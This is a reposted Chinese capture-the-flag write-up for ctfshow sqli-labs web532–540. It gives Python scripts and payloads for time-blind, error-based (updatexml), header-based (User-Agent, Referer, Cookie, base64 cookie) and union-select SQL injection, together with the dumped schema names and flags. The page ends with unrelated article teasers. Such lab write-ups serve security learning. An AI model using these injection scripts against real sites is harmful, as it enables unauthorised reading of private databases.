ctfshow sqli-labs web532--web540

web532

在这里插入图片描述
时间盲注
admin")闭合

import requests

url="https://8b83d32c-8348-4393-ad72-08d00f7f6cd0.challenge.ctf.show/"
flag=""
i=0
while True:
    i += 1
    low = 32
    high =127

    while low < high:
        mid = (low+high)//2

        #payload=f"if((ascii(substr((database()),{i},1))>{mid}),sleep(0.4),0)"
        #payload=f"if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.4),0)"
        #payload=f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.4),0)"
        #payload=f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{i},1))>{mid}),sleep(0.4),0)"
        payload=f"if((ascii(substr((select group_concat(id,flag4sa) from ctfshow.flagbab),{i},1))>{mid}),sleep(0.4),0)"
        data={
            'uname':f'admin")and {payload}#',
            'passwd':'1'
        }


        try:
          r=requests.post(url=url,data=data,timeout=0.3)
          high =mid
        except:
           low =mid +1
    if low!= 32:
        flag+=chr(low)
    else:
        break
    print(flag)

web533

在这里插入图片描述

正常注入我以为我句子写错了 ,原来注入不在uname

passwd=1' or updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),3)#&uname=admin
XPATH syntax error: '=ctfshow,ctftraining,information'

passwd=1' or updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),3)#&uname=admin
XPATH syntax error: '=flag'

passwd=1' or updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flag')),3)#&uname=admin
XPATH syntax error: '=id,flag4'

passwd=1' or updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),3)#&uname=admin
XPATH syntax error: '=ctfshow{1046efc1-8cd3-4d61-ac6f'

passwd=1' or updatexml(1,concat(0x3d,(select right(flag4,14) from ctfshow.flag)),3)#&uname=admin
XPATH syntax error: '=-1e404b8bee73}'

但是我做这道题的时候是比较萌萌的,我的payload是应该没错的但是一直触发不了

web534

在这里插入图片描述

uname:admin	
passwd:admin

后面发现DUMB为账号密码也可以
发现是UA注入(用报错注入语句)

在这里插入图片描述

这个闭合方式,还正常但是他不出结果,加了个恒等

' or updatexml(1,concat(0x3d,(select group_concat(schema_name)from information_schema.schemata)),3) or '1'='1''
XPATH syntax error: '=ctfshow,ctftraining,information'

' or updatexml(1,concat(0x3d,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')),3) or '1'='1''
XPATH syntax error: '=flag'


' or updatexml(1,concat(0x3d,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3) or '1'='1''
XPATH syntax error: '=id,flag4'

' or updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),3) or '1'='1''
XPATH syntax error: '=ctfshow{f8f1ad98-b4bf-4f30-8865'

' or updatexml(1,concat(0x3d,(select right(flag4,14) from ctfshow.flag)),3) or '1'='1''
XPATH syntax error: '=-849ca0a1a9c4}'

也可以用python
format函数是将特定内容放入{}占位符中

import requests

url="https://0a0540f0-d712-4231-bba8-9f0bb10037f2.challenge.ctf.show/"
flag=""
# sql="(select group_concat(schema_name)from information_schema.schemata)"
# sql="(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')"
# sql="(select group_concat(column_name)from information_schema.columns where table_name='flag')"
# sql="(select group_concat(flag4) from ctfshow.flag)"
sql="(select right(flag4,14) from ctfshow.flag)"
payload="' or updatexml(1,concat(0x3d,({})),3) or '1'='1''"
headers={
    "User-Agent":payload.format(sql)
}
data={
    'uname':'admin',
    'passwd':'admin'
}
r=requests.post(url=url,data=data,headers=headers)
print(r.text)

web535

admin账号密码登录
在这里插入图片描述

Your Referer is: https://f288320e-b036-421a-868c-c7e1534110cc.challenge.ctf.show/
这次应该是referer注入(还是用报错语句)

在这里插入图片描述

' or updatexml(1,concat(0x3d,(select group_concat(schema_name)from information_schema.schemata)),3) or '1'='1''
XPATH syntax error: '=ctfshow,ctftraining,information'

' or updatexml(1,concat(0x3d,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')),3) or '1'='1''
XPATH syntax error: '=flag'


' or updatexml(1,concat(0x3d,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3) or '1'='1''
XPATH syntax error: '=id,flag4'

' or updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),3) or '1'='1''
XPATH syntax error: '=ctfshow{14825962-d768-4e62-903b'

' or updatexml(1,concat(0x3d,(select right(flag4,14) from ctfshow.flag)),3) or '1'='1''
XPATH syntax error: '=-43eaed135220}'
import requests

url="https://f02a9b6f-01aa-4ae0-9a49-1a15d0acf43c.challenge.ctf.show/"
flag=""
# sql="(select group_concat(schema_name)from information_schema.schemata)"
# sql="(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')"
# sql="(select group_concat(column_name)from information_schema.columns where table_name='flag')"
# sql="(select group_concat(flag4) from ctfshow.flag)"
sql="(select right(flag4,14) from ctfshow.flag)"
payload="' or updatexml(1,concat(0x3d,({})),3) or '1'='1''"
headers={
    "Referer":payload.format(sql)
}
data={
    'uname':'admin',
    'passwd':'admin'
}
r=requests.post(url=url,data=data,headers=headers)
print(r.text)

web536

admin登录之后叫我删除cookie怀疑是cookie注入
在这里插入图片描述

cf_clearance=HappyNewYear; uname=admin' or updatexml(1,concat(0x3d,(select group_concat(schema_name ) from information_schema.schemata)),3) or '1'='1''

成功
在这里插入图片描述

cf_clearance=HappyNewYear; uname=admin' or updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),3) or '1'='1''
ctfshow{c1be5132-97d2-4a37-8334

cf_clearance=HappyNewYear; uname=admin' or updatexml(1,concat(0x3d,(select right(flag4,14) from ctfshow.flag)),3) or '1'='1''
Issue with your mysql: XPATH syntax error: '=-84a3cd8df6ba}'
import requests

url="https://a5c77603-c9c3-4982-9014-de0e5dfd29db.challenge.ctf.show/"
flag=""
# sql="(select group_concat(schema_name)from information_schema.schemata)"
# sql="(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')"
# sql="(select group_concat(column_name)from information_schema.columns where table_name='flag')"
# sql="(select group_concat(flag4) from ctfshow.flag)"
sql="(select right(flag4,14) from ctfshow.flag)"
payload="' or updatexml(1,concat(0x3d,({})),3) or '1'='1''"
headers={
    "Cookie":'uname='+payload.format(sql)
}
data={
    'uname':'admin',
    'passwd':'admin'
}
r=requests.post(url=url,data=data,headers=headers)
print(r.text)

web537

在这里插入图片描述
被base64加密了
闭合方式没有变直接'闭合就行

import base64

import requests

url="https://5f482b71-af6c-4e47-b36a-bf1f4ca45f95.challenge.ctf.show/"
flag=""
# sql="(select group_concat(schema_name)from information_schema.schemata)"
# sql="(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')"
# sql="(select group_concat(column_name)from information_schema.columns where table_name='flag')"
# sql="(select group_concat(flag4) from ctfshow.flag)"
sql="(select right(flag4,14) from ctfshow.flag)"
payload="' or updatexml(1,concat(0x3d,({})),3) or '1'='1''"
headers={
    "Cookie":'uname='+base64.b64encode(payload.format(sql).encode()).decode()
}
data={
    'uname':'admin',
    'passwd':'admin'
}
r=requests.post(url=url,data=data,headers=headers)
print(r.text)

还是比较简单的这里我就不手注入了,麻烦

ctfshow{86c55f25-8cf0-45f9-afd7-00478b609cbc}

web538

"闭合然后恒等不好写了,我就直接#注释了

import base64

import requests

url="https://d6bab88c-824f-4db3-a509-799f7e8e6341.challenge.ctf.show/"
flag=""
# sql="(select group_concat(schema_name)from information_schema.schemata)"
# sql="(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')"
# sql="(select group_concat(column_name)from information_schema.columns where table_name='flag')"
# sql="(select group_concat(flag4) from ctfshow.flag)"
sql="(select right(flag4,14) from ctfshow.flag)"
payload='" or updatexml(1,concat(0x3d,({})),3)#'
headers={
    "Cookie":'uname='+base64.b64encode(payload.format(sql).encode()).decode()
}
data={
    'uname':'admin',
    'passwd':'admin'
}
r=requests.post(url=url,data=data,headers=headers)
print(r.text)

web539

联合注入即可

?id=-1' union select 1,2,3'

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3'
Your Login name:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3'
Your Login name:flag

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3'
Your Login name:id,flag4

?id=-1' union select 1,(select group_concat(id,flag4) from ctfshow.flag),3'
Your Login name:1ctfshow{fcdaba8a-b8b2-4adc-9b0c-4ab759481318}

web 540

服了欠着不会
这三个页面我找不到注入点在哪里,麻了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/758770.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

大语言模型(LLMs)全面学习指南,初学者入门,一看就懂!

大语言模型&#xff08;LLMs&#xff09;作为人工智能&#xff08;AI&#xff09;领域的一项突破性发展&#xff0c;已经改变了自然语言处理&#xff08;NLP&#xff09;和机器学习&#xff08;ML&#xff09;应用的面貌。这些模型&#xff0c;包括OpenAI的GPT-4o和Google的gem…

kafka(一)原理(2)组件

一、broker 1、介绍 kafka服务器的官方名字&#xff0c;一个集群由多个broker组成&#xff0c;一个broker可以容纳多个topic。 2、工作流程 3、重要参数 参数名称 描述 replica.lag.time.max.ms ISR中&#xff0c;如果Follower长时间未向Leader发送通信请求或同步数据&a…

计算机图形学笔记----矩阵

矩阵和标量的运算 ,则 矩阵与矩阵相乘 的矩阵A&#xff0c;的矩阵B。两矩阵&#xff0c;结果为的矩阵&#xff0c;第一个矩阵的列数必须和第二个矩阵的行数相同&#xff0c;否则不能相乘 &#xff0c;中的每个元素等于A的第i行所对应的矢量和B的第j列所对应的矢量进行矢量点…

【滚动哈希】2156. 查找给定哈希值的子串

本文涉及知识点 滚动哈希 LeetCode2156. 查找给定哈希值的子串 给定整数 p 和 m &#xff0c;一个长度为 k 且下标从 0 开始的字符串 s 的哈希值按照如下函数计算&#xff1a; hash(s, p, m) (val(s[0]) * p0 val(s[1]) * p1 … val(s[k-1]) * pk-1) mod m. 其中 val(s[…

015、HBase分布式数据库与传统数据库的深度对比

目录 HBase分布式数据库与传统数据库的深度对比 1. 数据模型 1.1 传统关系型数据库 1.2 HBase 2. 扩展性 2.1 传统关系型数据库 2.2 HBase 3. 查询语言 3.1 传统关系型数据库 3.2 HBase 4. 事务支持 4.1 传统关系型数据库 4.2 HBase 5. 数据一致性 5.1 传统关系型…

《C语言》编译和链接

文章目录 一、翻译环境1、预处理2、编译3、汇编4、链接 二、运行环境 一、翻译环境 在使用编译器编写代码时&#xff0c;编写的代码是高级语言&#xff0c;机器无法直接识别和运行&#xff0c;在编译器内部会翻译成机器可执行的机器语言。 编译环境由编译和链接两大过程组成。 …

深度之眼(二十九)——神经网络基础知识(四)-循环神经网络

文章目录 一、 学习目标二、序列数据三、语言模型四、循环神经网络4.1 RNN的反向传播 五、门控循环单元-GNU5.1 候选隐藏状态 六、长短期记忆网络-LSTM七、回顾 一、 学习目标 二、序列数据 序列数据是常见的数据类型&#xff0c;前后数据通常具有关联性 三、语言模型 综合…

PyQt问题汇总(持续更新)

目录 1.抛出异常后QAppliaction自动闪退 2.Unbuntu共享文件夹自动挂载 1.抛出异常后QAppliaction自动闪退 开发阶段&#xff0c;PyQt5 QAppliaction会在遇到未捕获的异常时立即退出&#xff0c;它能够快速发现并报告错误&#xff0c;我在调用一些密码算法库的时候&#xff0…

传媒行业指哪些?需要过等保吗?

传媒&#xff0c;一个人人都接触的行业。相信大家都听过传媒&#xff0c;但具体传媒行业是指什么&#xff0c;包括哪些&#xff0c;详细很多人都不了解。这不一些人在问&#xff0c;传媒行业指哪些&#xff1f;需要过等保吗&#xff1f;这里跟我们小编一起来讨论讨论吧&#xf…

SpringMVC 域对象共享数据

文章目录 1、使用ServletAPI向request域对象共享数据2、使用ModelAndView向request域对象共享数据3、使用Model向request域对象共享数据4、使用map向request域对象共享数据5、使用ModelMap向request域对象共享数据6、Model、ModelMap、Map的关系7、向session域共享数据8、向app…

Pikachu 不安全的文件下载(Unsafe file download)概述 附漏洞利用案例

目录 获取下载链接 修改链接 重新构造链接 拓展 不安全的文件下载概述 文件下载功能在很多web系统上都会出现&#xff0c;一般我们当点击下载链接&#xff0c;便会向后台发送一个下载请求&#xff0c;一般这个请求会包含一个需要下载的文件名称&#xff0c;后台在收到请求…

PyCharm 2024.1 版本更新亮点:智能编程,高效协作

目录 1. 前言2. 更新内容2.1 智能编码体验2.1.1 Hugging Face 文档预览2.1.2 全行代码补全 2.2 提升编辑器体验2.2.1 粘性行功能2.2.2 编辑器内代码审查 2.3 全新终端体验&#xff08;测试版&#xff09;2.3.1 新终端 Beta 2.4 智能助手&#xff08;特定版本和专业用户&#xf…

Springboot学习中错误与解决方法合集

1. 报错CONDITIONS EVALUATION REPORT &#xff08;1&#xff09;现象 类似&#xff1a; 出现问题原因&#xff1a;日志文件过多 &#xff08;2&#xff09; 解决方法&#xff1a; 在application.yml配置文件中增加 logging:level:org.springframework.boot.autoconfigure…

grpc编译

1、cmake下载 Download CMakehttps://cmake.org/download/cmake老版本下载 Index of /fileshttps://cmake.org/files/2、gprc源码下载&#xff0c;发现CMAKE报错 3、使用git下载 1&#xff09;通过git打开一个目录&#xff1a;如下grpc将放在D盘src目录下 cd d: cd src2&am…

每天五分钟深度学习框架pytorch:tensor向量之间常用的运算操作

本文重点 在数学中经常有加减乘除运算,在tensor中也不例外,也有类似的运算,本节课程我们将学习tensor中的运算 常见运算 加法+或者add import torch import numpy as np a=torch.rand(16,3,28,28) b=torch.rand(1,3,28,28) print(a+b) import torch import numpy as np a…

前端Web开发HTML5+CSS3+移动web视频教程 Day3 CSS 第1天

P29 - P43 从此开始进入 CSS 的学习。前面都是 HTML 的学习。 CSS 的作用&#xff1a;美化。 HTML 只是规定了网页内容有哪些&#xff0c;在网页中显示的位置默认是从上到下显示&#xff0c;还带有默认效果&#xff0c;比如超链接有颜色有下划线&#xff0c;无序列表有小圆点…

CocosCreator构建IOS教程

CocosCreator构建IOS教程 添加include: Header Search Paths:拖拽include过来 添加SoundEngine: Header Search Paths: 把SoundEngine POSIX Common 三个文件夹拖拽到里面去

操作系统精选题(二)(综合模拟题一)

&#x1f308; 个人主页&#xff1a;十二月的猫-CSDN博客 &#x1f525; 系列专栏&#xff1a; &#x1f3c0;操作系统 &#x1f4aa;&#x1f3fb; 十二月的寒冬阻挡不了春天的脚步&#xff0c;十二点的黑夜遮蔽不住黎明的曙光 目录 前言 简答题 一、进程由计算和IO操作组…

读AI新生:破解人机共存密码笔记16对人工智能的治理

1. 愚蠢的、情绪化的人类 1.1. 与完美理性所设定的不可企及的标准相比&#xff0c;我们都是极其愚蠢的&#xff0c;我们受制于各种情绪的起伏&#xff0c;这些情绪在很大程度上支配着我们的行为 1.2. 为了充分了解人类的认知&#xff0c;我们&#xff08;或者更确切地说&…

Java进阶-try-with-resources

Java进阶-try-with-resources try-with-resources 是什么传统使用try-catch-finally关闭资源使用try-with-resources什么时候用 try-with-resources 是什么 try-with-resources 是 Java 7 中引入的一个新特性&#xff0c;用于简化资源管理&#xff0c;一般是用于处理实现了 Au…